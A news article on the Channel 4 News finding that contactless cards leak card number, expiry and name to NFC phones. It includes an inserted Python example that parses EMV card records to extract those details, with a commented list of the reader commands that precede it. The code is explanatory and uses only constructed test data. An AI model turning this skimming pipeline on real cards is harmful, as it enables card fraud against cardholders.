One of many ‘next big things’ in the world of technology is the prospect of soon being able to use your mobile phone as a way to pay for things in the real world. The vision of replacing your wallet or purse with a mobile phone capable of handling all of your payment requirements is not a new one. But with smartphones such as Samsung's Galaxy Nexus now being equipped with near-field communication (NFC) hardware – and financial institutions working closely with network operators on infrastructure – it looks like that dream will soon, finally, be realised on a broad scale.
But while NFC technology is making its way slowly onto smartphones, the same short-range radio protocol (ISO 14443, which NFC phones also speak) is already widely used in so-called ‘contactless’ cards; many banks currently issue debit and credit cards with integrated contactless chips, allowing users to make payments for relatively small amounts without the hassle of entering a PIN or providing a signature. This week, the UK’s Channel 4 News revealed how easy it is to ‘steal’ data from these contactless cards, “using nothing more than an ordinary [NFC-capable] smartphone, and some specially-designed – but devastatingly simple – software”.
Channel 4 worked with security analysts viaForensics on its investigation; the company’s Thomas Cannon explained to correspondent Benjamin Cohen: “All I did was tap my phone over your wallet, and using the wireless reader on the phone, I was able to lift out the details from your card; that includes the long card number, the expiry date and your name. None of it was encrypted, it was simply a case of the details coming out through the air.”
The UK Card Association states that the cardholder’s name should not be among the data that are transmitted. But Barclays, the British bank at the centre of the controversy, insisted that it is “compliant with scheme rules for contactless cards”, adding that “the only information which can be obtained from a chip is the same as that which is printed on the front of the card”.
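To make concrete what “the details coming out through the air” means at the protocol level, the following is an added example (not the software Channel 4 or viaForensics used, and not from any bank or card scheme). An EMV contactless card answers a READ RECORD command with a BER-TLV record that carries the PAN (tag 5A), expiry date (5F24), cardholder name (5F20) and Track 2 Equivalent Data (57) in the clear; the code parses such a record and pulls those fields out. The reader-side commands that precede READ RECORD are listed in comments only, since driving a real NFC reader needs a transport library that is not included. The record bytes are constructed for this example using the public Visa test number 4111111111111111 and a made-up name and dates; they do not come from a real card, and the `encode_tlv` helper exists only to build that sample.

```python
# Added example: parse the BER-TLV record an EMV contactless card returns to
# READ RECORD and extract the card details that the report says a phone can read.
# The sample record below is constructed (Visa test PAN, fictitious name/dates).

from typing import Dict, Optional

# Commands a reader sends first (hex, ISO 7816-4 / EMV Book 1), not executed here:
#   00 A4 04 00 0E 32 50 41 59 2E 53 59 53 2E 44 44 46 30 31 00   SELECT PPSE "2PAY.SYS.DDF01"
#   00 A4 04 00 <len> <AID from the PPSE response> 00             SELECT the payment application
#   80 A8 00 00 <len> 83 <PDOL data> 00                           GET PROCESSING OPTIONS (returns the AFL)
#   00 B2 <record> <(sfi << 3) | 4> 00                            READ RECORD for each AFL entry
# The response to the last command is what parse_tlv() below consumes.


def parse_tlv(data: bytes) -> Dict[str, bytes]:
    """Flatten a BER-TLV byte string into {tag_hex: value}, descending into
    constructed tags (bit 6 of the first tag byte set, e.g. 70, 77, 6F, A5)."""
    out: Dict[str, bytes] = {}
    i, n = 0, len(data)
    while i < n:
        if data[i] in (0x00, 0xFF):            # inter-TLV padding bytes
            i += 1
            continue
        start = i
        first = data[i]
        i += 1
        if (first & 0x1F) == 0x1F:             # multi-byte tag: continue while bit 8 set
            while data[i] & 0x80:
                i += 1
            i += 1
        tag = data[start:i].hex().upper()
        length = data[i]
        i += 1
        if length & 0x80:                      # long-form length: low 7 bits = byte count
            count = length & 0x7F
            length = int.from_bytes(data[i:i + count], "big")
            i += count
        value = data[i:i + length]
        if len(value) != length:
            raise ValueError(f"truncated TLV at offset {start} (tag {tag})")
        i += length
        if first & 0x20:                       # constructed object: recurse into it
            out.update(parse_tlv(value))
        else:
            out[tag] = value
    return out


def luhn_ok(pan: str) -> bool:
    """Mod-10 check every PAN must pass; a cheap filter against mis-parsed data."""
    total = 0
    for idx, ch in enumerate(reversed(pan)):
        d = int(ch)
        if idx % 2 == 1:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def mask_pan(pan: str) -> str:
    """PCI-style masking (first 6, last 4) for anything you log or display."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def extract_card_details(record: bytes) -> Dict[str, Optional[str]]:
    """Pull PAN, expiry (MM/YY) and cardholder name out of a READ RECORD response.
    Track 2 Equivalent Data (tag 57) is used as a fallback: some cards omit 5A and
    5F24, but tag 57 always carries the PAN and expiry."""
    tlvs = parse_tlv(record)
    details: Dict[str, Optional[str]] = {"pan": None, "expiry": None, "name": None}
    if "5A" in tlvs:
        details["pan"] = tlvs["5A"].hex().upper().rstrip("F")   # compressed numeric, F-padded
    if "5F24" in tlvs:                                            # YYMMDD
        yymmdd = tlvs["5F24"].hex()
        details["expiry"] = f"{yymmdd[2:4]}/{yymmdd[0:2]}"
    if "5F20" in tlvs:
        details["name"] = tlvs["5F20"].decode("ascii", "replace").strip()
    if "57" in tlvs:
        track2 = tlvs["57"].hex().upper().rstrip("F")
        pan, _, rest = track2.partition("D")                      # 'D' separates PAN from YYMM + service code
        details["pan"] = details["pan"] or pan
        details["expiry"] = details["expiry"] or f"{rest[2:4]}/{rest[0:2]}"
    if details["pan"] and not luhn_ok(details["pan"]):
        raise ValueError("PAN failed Luhn check; record probably mis-parsed")
    return details


def encode_tlv(tag: bytes, value: bytes) -> bytes:
    """Encode one short-form TLV (value < 128 bytes); used only to build the sample."""
    return tag + bytes([len(value)]) + value


# Constructed sample record template (tag 70) as a card might return it.
# Note what is NOT here: the PIN, and the CVV2 printed on the back of the card,
# which is deliberately not stored on the chip.
SAMPLE_RECORD = encode_tlv(
    b"\x70",
    encode_tlv(b"\x5A", bytes.fromhex("4111111111111111"))                        # Application PAN
    + encode_tlv(b"\x5F\x24", bytes.fromhex("141231"))                           # Expiry 2014-12-31 (YYMMDD)
    + encode_tlv(b"\x5F\x20", b"CARDHOLDER/TEST")                                # Cardholder Name
    + encode_tlv(b"\x57", bytes.fromhex("4111111111111111D1412201123456789F")),  # Track 2 Equivalent
)

if __name__ == "__main__":
    d = extract_card_details(SAMPLE_RECORD)
    print(mask_pan(d["pan"]), d["expiry"], d["name"])
```

Two things worth noticing when running it: the name field (5F20) is optional and, per the scheme rules quoted above, should not be personalised onto the chip at all, yet the parser has to handle it because some issuers do include it; and the Track 2 fallback matters because a card that omits tags 5A and 5F24 still leaks its PAN and expiry through tag 57.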
Barclays further insisted that the bigger issue lies with retailers, not all of which impose strict security checks when processing card payments. In-person contactless payments (where the cardholder physically presents the card) are capped at relatively small amounts without a PIN or signature (typically around £15 / $25), but that limit is enforced by the payment terminal and does nothing to protect the card number itself. Once the card details have been surreptitiously scanned, they can be used online for far larger purchases, particularly with retailers that perform fewer checks on card-not-present transactions.
In fact, Channel 4 News was able to use the limited card data lifted by the smartphone, which included neither the PIN nor the three-digit CVV/CSC printed on the rear signature strip (a value deliberately absent from the chip data precisely so that it cannot be harvested this way), to purchase products online from Amazon. C4 News did so using just the cardholder name, card number and expiry date, with no further checks required, even though the Amazon account had been set up in a different name from that on the card and the products were sent to an address not associated with the card. Amazon did not respond to Channel 4’s requests for comment.
The UK government Department for Business, Innovation and Skills has called for an urgent investigation, calling on Barclays and VISA to "act quickly to address this issue and to cancel and replace cards if necessary". With some 13 million customers already using contactless cards, that could prove rather costly.
While Channel 4 News wasn’t able to use the software to read data from cards issued by other British banks, the weaknesses exposed in what should be a robust and secure system are still cause for concern, and highlight the work that still needs to be done before we can realistically rely solely on NFC-based payment solutions. It also remains to be seen whether similar vulnerabilities exist in contactless cards issued by banks outside the UK.
You can watch the full report from Channel 4 News below: